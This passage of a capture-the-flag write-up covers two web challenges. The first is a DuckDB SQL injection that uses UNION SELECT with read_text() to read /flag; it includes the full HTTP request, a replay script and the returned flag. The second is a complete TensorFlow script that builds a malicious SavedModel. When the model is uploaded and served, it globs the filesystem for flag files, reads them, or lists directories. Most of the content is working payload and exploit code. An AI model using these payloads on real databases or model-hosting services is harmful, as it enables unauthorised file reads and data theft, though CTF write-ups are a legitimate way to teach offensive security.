life') AS score, node_id, text FROM documents UNION SELECT '1500', '!', concat('life', version()) UNION SELECT concat('0
Construct the following payload for the challenge:
{ 'question': '') AS score, node_id, text FROM documents WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(column0) FROM read_text('/app/app.py')) UNION SELECT concat('0' }
The guessed column name triggers a BinderException. Analyzing the error:
BinderException
duckdb.duckdb.BinderException: Binder Error: Referenced column 'column0' not found in FROM clause!
Candidate bindings: 'content'
LINE 3: ... WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(column0) FROM read_text('/app/app.py')) UNION SELECT concat...
^
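The hint "Candidate bindings: 'content'" is DuckDB telling us that the table function read_text() exposes the file body in a column named content. This can be confirmed locally with the duckdb Python package (a quick sketch, not part of the challenge; any readable file works as the path):

import duckdb

# DESCRIBE lists the columns read_text() exposes -- 'content' is the one named in the binder hint
print(duckdb.sql("DESCRIBE SELECT * FROM read_text('/etc/hostname')"))
# Reading a file the same way the injected subquery does
print(duckdb.sql("SELECT string_agg(content) FROM read_text('/etc/hostname')").fetchall())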
So the file content lives in a column named content rather than column0; adjust the payload accordingly:
{ 'question': '') AS score, node_id, text FROM documents WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(content) FROM read_text('/flag')) UNION SELECT concat('0' }
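To see why the payload has to start with ') and end with concat('0, it helps to sketch the query template the server presumably builds. app.py was never dumped (the /app/app.py read failed), so the template and the embedding_score() name below are assumptions; only the injection structure is taken from the payload itself:

question = ("') AS score, node_id, text FROM documents WHERE 1=2 "
            "UNION SELECT '1', 'node', (SELECT string_agg(content) FROM read_text('/flag')) "
            "UNION SELECT concat('0")

# Hypothetical template -- the function name and the ORDER BY / LIMIT details are guesses
query = f"""
SELECT embedding_score(embedding, '{question}') AS score, node_id, text
FROM documents
ORDER BY score DESC
LIMIT 2
"""
print(query)

After substitution, the leading ') closes the original string literal and function call, the UNION SELECT arms supply attacker-controlled (score, node_id, text) rows, and the trailing concat('0 re-opens a string so that the template's own ') AS score, node_id, text FROM documents ... suffix still parses.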
The final request is as follows:
POST /ask HTTP/1.1
Host: 47.93.255.58:20571
Accept-Encoding: gzip, deflate
Content-Type: application/json
Origin: http://47.93.255.58:20571
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Referer: http://47.93.255.58:20571/
Cookie: session=.eJwlzjsOwjAMANC7ZGawg42TXqbyV7CmdELcnUqc4L1P22vl8Wzbe515a_sr2tYYSeAOwz1BsqaYE3WCKg-11AqdQym6egU7ij-KNBOYiRMgWNBgTtfo3HMkUowoZTRDMXYDzPLROzFBpIYWi6rMS02hdkXOI9d_g-37A2aEMSQ.aMZNlg.hQdEKhaBZkw6D1cP44Jt5jddjx0
Content-Length: 16

{ 'question':'') AS score, node_id, text FROM documents WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(content) FROM read_text('/flag')) UNION SELECT concat('0' }
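The same request can be replayed from Python for convenience; this sketch sends standard double-quoted JSON and assumes whatever session cookie the site issued:

import requests

payload = {
    "question": "') AS score, node_id, text FROM documents WHERE 1=2 "
                "UNION SELECT '1', 'node', (SELECT string_agg(content) FROM read_text('/flag')) "
                "UNION SELECT concat('0"
}
resp = requests.post(
    "http://47.93.255.58:20571/ask",
    json=payload,
    cookies={"session": "<your session cookie>"},
)
print(resp.json())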
And the flag comes back:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.6 Python/3.8.20
Date: Sun, 14 Sep 2025 05:22:35 GMT
Content-Type: application/json
Vary: Cookie
Set-Cookie: session=.eJxVkFFLwzAUhf9KyEtXaDVJk6Ud-CBSUdAJ28QHHeU2uekK2mrTgjL2302ZLz7d3Jtzzv2SI63cgP5AV-MwYUKr1tIVVVxqlrHcGGQaXaFrI6WQzDljoUZwFoocpBVgnFWGa7N0EhCZUlIhY1ZpXrOiMGCFEpgjlza3DhSva65rZWrG0ZlcCKkkswgWnNIAughbUUsaQCaPw5mGh_bQ-rEffujq9Ui_JpxPNIrJ9ZZ40w-YkK63GOQJGfF7JLebp0diezN9YDd68nJXbkrCrwR5Xt8_rcm2fChvdiTiUUKi2Rnq4m_ox6HtmgqaZmH6bgz--Bw3BMxqTl9El-4dmiiO_8cFuYFwywJv-NPPvvMYgOksPmZmWYg8kyljwqUSRJ6ClDItMhTh-UsOwE9vXbDuDhjQG9J6YqYRL-j-tD_9Ao62f4I.aMZRGw.2A58-_PH3NO1WdDVBdMIGkA3mu0; HttpOnly; Path=/
Connection: close
Content-Length: 97

{ 'answer':[ 'flag{3c692834-002f-4a28-a444-93e2ada61aa1}\n', 'The dog is cute.' ] }
Mini-modelscope
The full exploit script is as follows:
import tensorflow as tf
import zipfile
import os
from pathlib import Path
import shutil
import tempfile


# Build a SavedModel (signature name 'serve', input [1, 1] float32, output a string tensor)
class M(tf.Module):
    @tf.function(input_signature=[tf.TensorSpec(shape=[1, 1], dtype=tf.float32)])
    def serve(self, x):
        # Use only native TF ops that serialize into the graph; py_function would
        # fail on the server with a missing-callback error.
        flag_patterns = [
            '/flag', '/flag.txt',
            '/home/*/flag', '/home/*/flag.txt',
            '/workspace/flag', '/workspace/*/flag', '/workspace/*/flag.txt',
            '/mnt/flag', '/mnt/flag.txt', '/mnt/*/flag', '/mnt/*/flag.txt',
            '/mnt/data/flag', '/mnt/data/flag.txt', '/mnt/data/*/flag', '/mnt/data/*/flag.txt',
            '/app/flag', '/app/*/flag', '/app/*/flag.txt',
            '/opt/flag', '/opt/*/flag', '/opt/*/flag.txt',
            '/var/flag', '/var/tmp/flag', '/var/*/flag',
            '/tmp/flag', '/tmp/flag.txt',
            '/srv/flag', '/srv/*/flag',
            '/etc/flag',
            '/root/flag', '/root/flag.txt'  # may be unreadable; an empty match is fine
        ]
        # Collect every candidate file that matches
        files_list = []
        for pat in flag_patterns:
            files_list.append(tf.io.matching_files(pat))  # -> 1D tf.string
        files = tf.concat(files_list, axis=0) if files_list else tf.constant([], dtype=tf.string)
        files = tf.unique(files).y  # deduplicate

        def _read_first_file():
            first = tf.gather(files, 0)
            content = tf.io.read_file(first)
            return tf.reshape(content, [1, 1])

        def _fallback_listing():
            # Build a directory listing using only matching_files / string ops, again avoiding py_function
            list_patterns = [
                '/*', '/home/*', '/workspace/*', '/mnt/*', '/mnt/data/*',
                '/app/*', '/opt/*', '/var/*', '/tmp/*', '/srv/*'
            ]
            ls_list = []
            for pat in list_patterns:
                ls_list.append(tf.io.matching_files(pat))
            ls = tf.concat(ls_list, axis=0) if ls_list else tf.constant([], dtype=tf.string)
            ls = tf.unique(ls).y
            # Join into one text blob; fall back to 'no-flag' if nothing matched
            has_any = tf.greater(tf.size(ls), 0)

            def _join_ls():
                joined = tf.strings.reduce_join(ls, separator='\n')
                return tf.reshape(joined, [1, 1])

            def _no_flag():
                return tf.constant([[b'no-flag']], dtype=tf.string)

            return tf.cond(has_any, _join_ls, _no_flag)

        has_file = tf.greater(tf.size(files), 0)
        out = tf.cond(has_file, _read_first_file, _fallback_listing)
        return {'prediction': out}


def build_and_zip(zip_path: str = 'model.zip'):
    # Use a temporary directory to avoid path collisions
    tmp_root = Path(tempfile.mkdtemp(prefix='savedmodel_'))
    export_dir = tmp_root / 'sm'
    export_dir.mkdir(parents=True, exist_ok=True)

    m = M()
    # Export the SavedModel with the signature name 'serve'
    tf.saved_model.save(m, str(export_dir), signatures={'serve': m.serve})

    # Pack the contents of the export directory at the zip root
    base = export_dir
    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as z:
        for root, dirs, files in os.walk(base):
            for f in files:
                full = Path(root) / f
                rel = full.relative_to(base)
                z.write(full, arcname=str(rel))

    print(f"SavedModel built at '{export_dir}', zipped to '{zip_path}'")

    # Optional cleanup
    try:
        shutil.rmtree(tmp_root)
    except Exception:
        pass


if __name__ == '__main__':
    build_and_zip()
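Before uploading model.zip, the SavedModel can be sanity-checked locally. The sketch below assumes TensorFlow 2.x and a hypothetical export directory './sm' (for example, re-run tf.saved_model.save() to a fixed path or skip the shutil.rmtree cleanup); the challenge service presumably loads the uploaded model and returns the 'prediction' output of the 'serve' signature, which is how the file content or directory listing ends up in the response:

import tensorflow as tf

loaded = tf.saved_model.load('./sm')  # hypothetical local export path
serve = loaded.signatures['serve']
# Dummy [1, 1] float32 input matching the declared input_signature
out = serve(x=tf.constant([[0.0]], dtype=tf.float32))
# File content if one of the flag patterns matched, otherwise the directory listing / 'no-flag'
print(out['prediction'].numpy())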